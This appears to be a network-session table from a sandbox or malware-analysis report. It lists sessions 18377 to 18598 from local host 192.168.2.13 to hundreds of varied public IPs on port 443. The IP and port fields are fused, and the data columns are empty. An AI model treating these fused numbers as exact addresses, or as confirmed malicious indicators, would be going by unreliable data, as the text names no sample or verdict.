                                        18377192.168.2.1344718219.215.121.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18378192.168.2.135768038.245.17.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18379192.168.2.133759648.201.63.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18380192.168.2.134703898.246.62.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18381192.168.2.135291050.84.181.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18382192.168.2.1342844132.2.79.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18383192.168.2.1354388124.79.178.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18384192.168.2.134146032.235.14.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18385192.168.2.135728276.217.54.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18386192.168.2.135430847.74.100.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18387192.168.2.1357670125.78.210.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18388192.168.2.1342936130.53.115.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18389192.168.2.1359218223.85.66.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18390192.168.2.1333652125.213.131.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18391192.168.2.135299066.11.1.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18392192.168.2.1353106221.51.184.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18393192.168.2.1350690103.35.168.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18394192.168.2.134771453.215.90.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18395192.168.2.1344702192.153.239.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18396192.168.2.1345036191.69.237.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18397192.168.2.1356066195.229.135.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18398192.168.2.1336322165.82.135.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18399192.168.2.133883681.85.44.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18400192.168.2.1349856193.245.61.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18401192.168.2.135739047.65.34.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18402192.168.2.1349198101.67.213.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18403192.168.2.135021892.150.4.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18404192.168.2.133992240.105.169.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18405192.168.2.133489054.32.69.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18406192.168.2.1344126167.72.90.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18407192.168.2.133854278.55.88.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18408192.168.2.134804839.160.34.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18409192.168.2.133681277.242.30.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18410192.168.2.1342134176.253.120.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18411192.168.2.1336462178.171.138.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18412192.168.2.1334630202.123.12.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18413192.168.2.1348140139.84.252.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18414192.168.2.1334588150.116.141.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18415192.168.2.134867868.230.146.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18416192.168.2.1351986193.21.166.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18417192.168.2.1355058177.180.252.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18418192.168.2.1338182210.201.207.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18419192.168.2.1334934135.149.235.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18420192.168.2.133833857.138.65.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18421192.168.2.1350982207.195.220.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18422192.168.2.1350438124.242.202.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18423192.168.2.1352776207.8.195.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18424192.168.2.1339264200.243.167.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18425192.168.2.1337522194.181.130.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18426192.168.2.1341644161.58.138.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18427192.168.2.134328620.20.201.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18428192.168.2.134630238.254.110.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18429192.168.2.1338692200.221.173.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18430192.168.2.135303034.247.144.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18431192.168.2.1334280154.116.148.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18432192.168.2.134795275.12.240.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18433192.168.2.1338044102.9.194.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18434192.168.2.133867448.254.164.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18435192.168.2.1351248203.34.66.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18436192.168.2.1343428129.37.155.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18437192.168.2.1355206212.4.132.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18438192.168.2.1359556126.34.5.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18439192.168.2.133534247.130.206.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18440192.168.2.1341020191.127.212.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18441192.168.2.134554896.158.17.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18442192.168.2.1338528220.190.218.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18443192.168.2.134513840.13.247.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18444192.168.2.13440861.189.71.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18445192.168.2.134747090.77.208.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18446192.168.2.135936463.182.197.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18447192.168.2.1358906141.84.152.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18448192.168.2.135199240.163.62.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18449192.168.2.1348820115.121.160.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18450192.168.2.1345142113.241.122.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18451192.168.2.1359310139.53.18.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18452192.168.2.134112854.7.127.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18453192.168.2.1340936164.110.185.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18454192.168.2.1342510199.220.17.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18455192.168.2.1347500136.230.130.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18456192.168.2.1338662106.203.140.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18457192.168.2.134669438.217.47.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18458192.168.2.133416851.14.195.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18459192.168.2.133925691.204.109.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18460192.168.2.1358448105.138.41.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18461192.168.2.1350334202.223.21.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18462192.168.2.1333616204.202.118.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18463192.168.2.135207242.108.34.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18464192.168.2.1359004116.82.254.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18465192.168.2.1346480205.227.33.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18466192.168.2.134072827.86.244.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18467192.168.2.1338398168.252.240.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18468192.168.2.1342500135.32.62.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18469192.168.2.1338196149.16.33.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18470192.168.2.134361282.152.16.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18471192.168.2.135409218.158.237.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18472192.168.2.135132843.66.249.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18473192.168.2.1349012155.229.165.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18474192.168.2.1352184209.36.142.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18475192.168.2.1353714211.141.249.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18476192.168.2.134673699.92.61.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18477192.168.2.133515070.145.32.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18478192.168.2.1344692134.60.204.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18479192.168.2.135342025.95.206.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18480192.168.2.135582872.228.182.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18481192.168.2.135203814.43.177.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18482192.168.2.1360306201.158.16.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18483192.168.2.1349836195.61.201.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18484192.168.2.1344880120.188.85.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18485192.168.2.1337922104.107.165.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18486192.168.2.1339562121.24.188.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18487192.168.2.1338024105.218.14.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18488192.168.2.134746461.93.228.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18489192.168.2.1332896115.119.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18490192.168.2.136047638.253.80.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18491192.168.2.1360234100.189.93.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18492192.168.2.1341526132.242.20.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18493192.168.2.1358706218.251.104.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18494192.168.2.135707071.173.244.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18495192.168.2.1352756183.139.206.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18496192.168.2.1353366152.51.218.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18497192.168.2.134099891.170.250.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18498192.168.2.134494893.141.50.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18499192.168.2.1337274212.205.230.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18500192.168.2.133944264.155.201.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18501192.168.2.1332838108.249.57.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18502192.168.2.133601288.200.22.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18503192.168.2.1358166201.124.188.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18504192.168.2.13608321.43.143.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18505192.168.2.134680892.26.140.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18506192.168.2.1353570181.32.83.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18507192.168.2.135831237.150.230.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18508192.168.2.1346484202.15.233.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18509192.168.2.1341042130.3.228.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18510192.168.2.1337502149.105.101.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18511192.168.2.135796890.56.37.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18512192.168.2.1333788150.223.159.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18513192.168.2.1338754137.96.131.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18514192.168.2.135921061.123.132.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18515192.168.2.1348314172.233.164.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18516192.168.2.135609023.141.119.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18517192.168.2.135963046.33.68.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18518192.168.2.1346570189.95.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18519192.168.2.1352154139.143.112.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18520192.168.2.1338900180.49.156.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18521192.168.2.1337756210.23.131.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18522192.168.2.135159665.22.144.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18523192.168.2.1335176128.176.130.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18524192.168.2.1358610166.54.83.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18525192.168.2.1334514220.202.135.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18526192.168.2.1334586124.208.176.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18527192.168.2.1345208173.75.209.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18528192.168.2.1359808115.124.4.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18529192.168.2.135991251.232.153.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18530192.168.2.1359922148.76.63.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18531192.168.2.1358266140.121.138.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18532192.168.2.136033027.92.80.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18533192.168.2.133307479.61.118.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18534192.168.2.1340202142.231.222.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18535192.168.2.1342468124.167.7.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18536192.168.2.1341160211.231.102.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18537192.168.2.133594881.27.188.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18538192.168.2.1349320196.88.245.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18539192.168.2.1339446134.181.244.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18540192.168.2.1360264201.9.0.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18541192.168.2.133382448.42.111.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18542192.168.2.134868494.197.121.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18543192.168.2.1350228212.175.140.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18544192.168.2.1357376150.150.34.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18545192.168.2.134102288.77.198.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18546192.168.2.1339858116.161.1.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18547192.168.2.133770695.0.53.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18548192.168.2.133401282.148.179.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18549192.168.2.1344802206.79.107.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18550192.168.2.134231873.246.119.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18551192.168.2.135471284.195.14.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18552192.168.2.1358046189.251.148.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18553192.168.2.134984449.81.191.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18554192.168.2.135517095.244.18.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18555192.168.2.133699051.130.141.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18556192.168.2.134201691.248.235.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18557192.168.2.1356636134.135.243.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18558192.168.2.1339760105.48.71.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18559192.168.2.134812635.184.175.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18560192.168.2.1345926139.58.143.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18561192.168.2.134734019.33.229.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18562192.168.2.1333736157.232.198.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18563192.168.2.1357904158.225.160.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18564192.168.2.133734627.16.165.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18565192.168.2.1334464138.101.52.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18566192.168.2.1338978105.222.225.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18567192.168.2.135991483.198.12.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18568192.168.2.1338972142.128.38.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18569192.168.2.1334612190.136.4.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18570192.168.2.1337362213.181.71.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18571192.168.2.1343526164.155.107.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18572192.168.2.1354942168.21.207.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18573192.168.2.135154482.202.254.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18574192.168.2.1339824104.20.63.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18575192.168.2.1355568219.137.141.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18576192.168.2.1350184216.95.249.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18577192.168.2.1349682207.117.14.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18578192.168.2.1352652108.161.133.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18579192.168.2.13595065.26.159.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18580192.168.2.1333864132.226.141.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18581192.168.2.1354550112.25.196.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18582192.168.2.135590081.17.169.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18583192.168.2.134937665.133.117.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18584192.168.2.134946076.113.181.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18585192.168.2.134008427.91.179.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18586192.168.2.1334606197.80.237.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18587192.168.2.1356848124.124.127.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18588192.168.2.1347526122.172.247.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18589192.168.2.134073469.76.69.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18590192.168.2.1357392157.15.199.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18591192.168.2.1342114177.253.119.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18592192.168.2.1359392122.170.161.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18593192.168.2.1346916171.165.95.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18594192.168.2.1349784149.109.86.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18595192.168.2.1336408190.223.140.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18596192.168.2.1351958166.74.154.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18597192.168.2.1346544220.119.231.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18598192.168.2.1352550124.149.27.104443
                                        TimestampBytes transferredDirectionData


